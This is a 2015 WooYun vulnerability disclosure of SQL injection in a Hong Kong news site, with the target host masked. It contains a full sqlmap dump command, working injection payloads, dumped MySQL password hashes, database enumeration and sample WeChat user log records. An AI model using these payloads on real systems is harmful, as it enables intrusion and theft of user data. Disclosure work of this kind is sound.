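Vulnerability summary

Bug ID: wooyun-2015-0152956

Title: SQL injection in a page of 愛心新聞 (DBA privileges / root password leaked / 20 databases / 86 tables / IP information of 300,000+ users leaked / users' WeChat operation records leaked) (Hong Kong region)

Affected vendor: 愛心新聞

Author: 路人甲

Submitted: 2015-11-09 12:43

Fixed: 2016-01-11 15:32

Disclosed: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (hkcert, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]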


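Vulnerability details

Disclosure status:

2015-11-09: Details reported to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public

Brief description:

愛心新聞-國民教育新聞台

Detailed description:

URL: http://**.**.**.**/detail.php?id=13597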

python sqlmap.py -u "http://**.**.**.**/detail.php?id=13597" -p id --technique=BTU --random-agent -D wechat -T bl_weixin_log -C id,data --dump --threads=10 --start 1 --stop 5


1. DBA privileges, weak root password

current user:    'root@localhost'
current user is DBA: True
database management system users [4]:
[*] 'calawa'@'localhost'
[*] 'maracledb'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
database management system users password hashes:
[*] calawa [1]:
password hash: *1EEEFCFA35F1ED39D62F98F2C0255E198672DB23
[*] maracledb [1]:
password hash: *4BC9C2071D8A843BBFC4915E8B5E5B6274EDF5DD
[*] root [1]:
password hash: *B007A8ABA91B9610AD89FEDE5F38A5415F1514F7


2. IP information of more than 300,000 users leaked

Database: newsmydb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipcount | 149827 |


Database: lovetv_news
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipcount | 161064 |


3. Users' WeChat operation records leaked

Database: wechat
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bl_weixin_log | 108 |


A sample of the entries:

Database: wechat
Table: bl_weixin_log
[5 entries]
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | data |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 7213 | a:6:{s:10:"ToUserName";s:15:"gh_7faa910af686";s:12:"FromUserName";s:28:"oNiWWuMATRjQ9GQMLHS40jlHuTyM";s:10:"CreateTime";s:10:"1431101272";s:7:"MsgType";s:4:"text";s:7:"Content";s:3:"子";s:5:"MsgId";s:19:"6146533160709842432";} |
| 7214 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = ' |
| 7215 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword_type` > 0 ) ORDER BY keyword_length desc, id desc |
| 7216 | SELECT * FROM `bl_keyword` WHERE ( (`token` ='0' or token='gh_7faa910af686') ) AND ( `keyword` = '*' ) ORDER BY id desc LIMIT 1 |
| 7217 | Chat |
+------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Proof of vulnerability:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=13597 AND 6493=6493
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=13597 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=-5998 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767871,0x68624678677162514549626c59795a7047536b757279776d6e4871756265417748786f5274674765,0x716b787171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.4.38
back-end DBMS: MySQL 5.0.12
columns LIKE 'pass' were found in the following databases:
available databases [20]:
[*] bebebehappy
[*] bolaaw
[*] calawa
[*] calawa_hobby
[*] card
[*] cards
[*] comlaw
[*] fang
[*] information_schema
[*] jobs
[*] lovetv_news
[*] mydb
[*] mysql
[*] newsmydb
[*] performance_schema
[*] survey
[*] talents
[*] test
[*] wechat
[*] wine
Database: lovetv_news
[12 tables]
+--------------+
| ctrtb |
| hkl_news |
| ipaccess |
| ipcount |
| newstb |
| newstype |
| reportnews |
| shareuser |
| showdetailtb |
| showtb |
| showtype |
| vcount |
+--------------+
Database: wechat
[86 tables]
+-----------------------------------+
| bl_action |
| bl_action_log |
| bl_addon_category |
| bl_addons |
| bl_attachment |
| bl_attribute |
| bl_auth_extend |
| bl_auth_group |
| bl_auth_group_access |
| bl_auth_rule |
| bl_card_member |
| bl_card_notice |
| bl_category |
| bl_channel |
| bl_common_category |
| bl_common_category_group |
| bl_config |
| bl_coupon |
| bl_credit_config |
| bl_credit_data |
| bl_custom_menu |
| bl_custom_reply_mult |
| bl_custom_reply_news |
| bl_custom_reply_text |
| bl_document |
| bl_document_article |
| bl_document_download |
| bl_exam |
| bl_exam_answer |
| bl_exam_question |
| bl_extensions |
| bl_file |
| bl_follow |
| bl_forms |
| bl_forms_attribute |
| bl_forms_value |
| bl_forum |
| bl_hooks |
| bl_import |
| bl_keyword |
| bl_member |
| bl_member_public |
| bl_member_public_group |
| bl_member_public_link |
| bl_menu |
| bl_model |
| bl_picture |
| bl_prize |
| bl_qr_code |
| bl_scratch |
| bl_shop_footer |
| bl_shop_product |
| bl_smalltools |
| bl_sn_code |
| bl_store |
| bl_suggestions |
| bl_survey |
| bl_survey_answer |
| bl_survey_question |
| bl_test |
| bl_test_answer |
| bl_test_question |
| bl_tongji |
| bl_ucenter_admin |
| bl_ucenter_app |
| bl_ucenter_member |
| bl_ucenter_setting |
| bl_update_version |
| bl_url |
| bl_userdata |
| bl_vote |
| bl_vote_log |
| bl_vote_option |
| bl_weisite_category |
| bl_weisite_cms |
| bl_weisite_footer |
| bl_weisite_slideshow |
| bl_weixin_log |
| bl_youaskservice_behavior |
| bl_youaskservice_group |
| bl_youaskservice_keyword |
| bl_youaskservice_logs |
| bl_youaskservice_user |
| bl_youaskservice_wechat_enddate |
| bl_youaskservice_wechat_grouplist |
| bl_youaskservice_wxlogs |
+-----------------------------------+
Database: calawa_hobby
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| moves | 3414 |
| ipflow | 133 |
| musics | 102 |
| singer | 79 |
| moves_type | 30 |
| music_type | 8 |
| moves_tmp | 2 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: fang
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| newhouse | 10 |
| article | 4 |
| oldhouse | 4 |
+---------------------------------------+---------+
Database: calawa
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| newstb | 2677 |
| typenode | 128 |
| newstype | 38 |
| cz_music | 30 |
+---------------------------------------+---------+
Database: bebebehappy
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| news | 144 |
| cz_music | 30 |
| news_type | 15 |
| px_course | 15 |
| s_video | 12 |
| px_inspiration | 9 |
| px_coursetype | 6 |
| admin | 5 |
| manager | 2 |
+---------------------------------------+---------+
Database: newsmydb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipcount | 149827 |
| vcount | 4257 |
| newstb | 3071 |
| ctrtb | 650 |
| reportnews | 71 |
| newstype | 16 |
| ipaccess | 6 |
| showtype | 6 |
| showtb | 5 |
| hkl_news | 1 |
| shareuser | 1 |
| showdetailtb | 1 |
+---------------------------------------+---------+
Database: lovetv_news
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ipcount | 161064 |
| vcount | 5264 |
| newstb | 4494 |
| ctrtb | 982 |
| reportnews | 73 |
| newstype | 16 |
| showtype | 6 |
| showtb | 5 |
| hkl_news | 1 |
| ipaccess | 1 |
| shareuser | 1 |
| showdetailtb | 1 |
+---------------------------------------+---------+
Database: comlaw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| r_comlaw | 138 |
| r_employee | 27 |
| member | 7 |
| mytest | 5 |
| sector | 4 |
+---------------------------------------+---------+
Database: test
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| dede_sys_enum | 3347 |
| dede_area | 482 |
| dede_sysconfig | 153 |
| dede_arctiny | 125 |
| dede_archives | 124 |
| dede_co_mediaurls | 83 |
| dede_addonarticle | 80 |
| dede_uploads | 79 |
| dede_co_htmls | 73 |
| dede_co_urls | 73 |
| dede_addonimages | 28 |
| dede_arccache | 22 |
| dede_arctype | 20 |
| dede_myad | 20 |
| dede_stepselect | 15 |
| dede_scores | 12 |
| dede_mytag | 10 |
| dede_addonshop | 8 |
| dede_addonsoft | 8 |
| dede_arcatt | 8 |
| dede_arcrank | 8 |
| dede_flinktype | 8 |
| dede_plus | 8 |
| dede_member | 7 |
| dede_sys_module | 7 |
| dede_channeltype | 6 |
| dede_flink | 6 |
| dede_member_flink | 6 |
| dede_search_keywords | 6 |
| dede_feedback | 5 |
| dede_co_note | 4 |
| dede_payment | 4 |
| dede_shops_delivery | 4 |
| dede_admintype | 3 |
| dede_co_onepage | 3 |
| dede_member_msg | 3 |
| dede_moneycard_type | 3 |
| dede_tagindex | 3 |
| dede_freelist | 2 |
| dede_member_model | 2 |
| dede_member_stow | 2 |
| dede_member_stowtype | 2 |
| dede_member_vhistory | 2 |
| dede_sys_set | 2 |
| dede_admin | 1 |
| dede_arcmulti | 1 |
| dede_guestbook | 1 |
| dede_homepageset | 1 |
| dede_member_group | 1 |
| dede_member_person | 1 |
| dede_member_space | 1 |
| dede_member_tj | 1 |
| dede_member_type | 1 |
| dede_softconfig | 1 |
| dede_vote | 1 |
+---------------------------------------+---------+
Database: talents
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| addresstb | 944 |
| basicinfo | 416 |
| family | 251 |
| events | 124 |
| resume | 62 |
| contract | 34 |
| typetb | 30 |
| typetb_copy | 30 |
| holiday | 7 |
| upost | 2 |
| admin | 1 |
+---------------------------------------+---------+
Database: wechat
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bl_attribute | 509 |
| bl_auth_rule | 219 |
| bl_menu | 130 |
| bl_weixin_log | 108 |
| bl_model | 59 |
| bl_config | 43 |
| bl_addons | 31 |
| bl_credit_config | 19 |
| bl_credit_data | 17 |
| bl_hooks | 16 |
| bl_action | 12 |
| bl_custom_menu | 10 |
| bl_auth_extend | 8 |
| bl_addon_category | 4 |
| bl_tongji | 4 |
| bl_auth_group | 2 |
| bl_ucenter_member | 2 |
| bl_action_log | 1 |
| bl_category | 1 |
| bl_custom_reply_text | 1 |
| bl_document_article | 1 |
| bl_follow | 1 |
| bl_keyword | 1 |
| bl_member | 1 |
| bl_member_public | 1 |
| bl_member_public_link | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 3906 |
| STATISTICS | 642 |
| KEY_COLUMN_USAGE | 466 |
| PARTITIONS | 446 |
| TABLES | 446 |
| TABLE_CONSTRAINTS | 401 |
| SESSION_VARIABLES | 326 |
| GLOBAL_VARIABLES | 315 |
| GLOBAL_STATUS | 310 |
| SESSION_STATUS | 310 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| USER_PRIVILEGES | 55 |
| SCHEMA_PRIVILEGES | 54 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| SCHEMATA | 20 |
| ENGINES | 9 |
| PROCESSLIST | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
+---------------------------------------+---------+
Database: bolaaw
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ofproperty | 28 |
| ofsecurityauditlog | 19 |
| blhappyvalue | 13 |
| blyyxl | 13 |
| ofpresence | 8 |
| ofuser | 8 |
| ofid | 5 |
| blhappybase | 4 |
| ofpubsubdefaultconf | 2 |
| ofmucservice | 1 |
| ofpubsubaffiliation | 1 |
| ofpubsubnode | 1 |
| ofversion | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 1027 |
| help_topic | 508 |
| help_keyword | 464 |
| help_category | 38 |
| `user` | 4 |
| db | 3 |
| func | 1 |
| proxies_priv | 1 |
+---------------------------------------+---------+
Database: cards
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `user` | 1 |
+---------------------------------------+---------+
Database: survey
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `user` | 1 |
| question | 1 |
+---------------------------------------+---------+
Database: jobs
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| jobsname | 652 |
| jobstype | 42 |
| com_industry | 39 |
| jobs | 7 |
| jobsuser | 6 |
| jobcom | 4 |
| jobarticle | 2 |
| jobresume | 2 |
+---------------------------------------+---------+
Database: card
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bl_picture | 276 |
| bl_auth_rule | 215 |
| bl_document | 172 |
| bl_document_card | 172 |
| bl_menu | 111 |
| bl_action_log | 66 |
| bl_config | 27 |
| bl_attribute | 26 |
| bl_auth_extend | 14 |
| bl_action | 11 |
| bl_hooks | 11 |
| bl_addons | 7 |
| bl_category | 6 |
| bl_auth_group | 3 |
| bl_channel | 3 |
| bl_member | 2 |
| bl_model | 2 |
| bl_ucenter_member | 2 |
| bl_auth_group_access | 1 |
+---------------------------------------+---------+
Database: mydb
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| rptodopic | 9602 |
| ipcount | 8370 |
| chappyshare | 6716 |
| rptodotb | 6705 |
| happyshare | 3206 |
| newstb | 2270 |
| projectpic | 852 |
| com3_todo | 593 |
| todotb | 434 |
| projecttb | 433 |
| comstb | 423 |
| ctrtb | 327 |
| admin | 203 |
| producttb | 149 |
| pruton_news | 115 |
| kehutb | 100 |
| assetstb | 90 |
| assetspic | 84 |
| pruton_englishnews | 38 |
| com3_admin | 31 |
| ggkehutb | 28 |
| typetb | 26 |
| calawarptype | 25 |
| comstypetb | 25 |
| ggkehutypetb | 25 |
| kehutypetb | 25 |
| mistypetb | 25 |
| newstype | 16 |
| mistb | 15 |
| basicinfo | 13 |
| comuserpic | 10 |
| materialtb | 9 |
| comroot | 7 |
| addresstb | 4 |
| com4_admin | 4 |
| com5_admin | 4 |
| productpic | 4 |
| comtb | 3 |
| ipaccess | 1 |
| mytb | 1 |
| wyhtodotb | 1 |
+---------------------------------------+---------+
Database: lovetv_news
Table: ipcount
[4 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| id | numeric |
| ip | non-numeric |
| page | non-numeric |
| site | non-numeric |
+--------+-------------+
Database: wechat
Table: bl_weixin_log
[2 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| data | non-numeric |
| id | numeric |
+--------+-------------+

Remediation:

Deploy a WAF.

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmation time: 2015-11-20 15:33

Vendor reply:

Referred to related parties.

Latest status:

None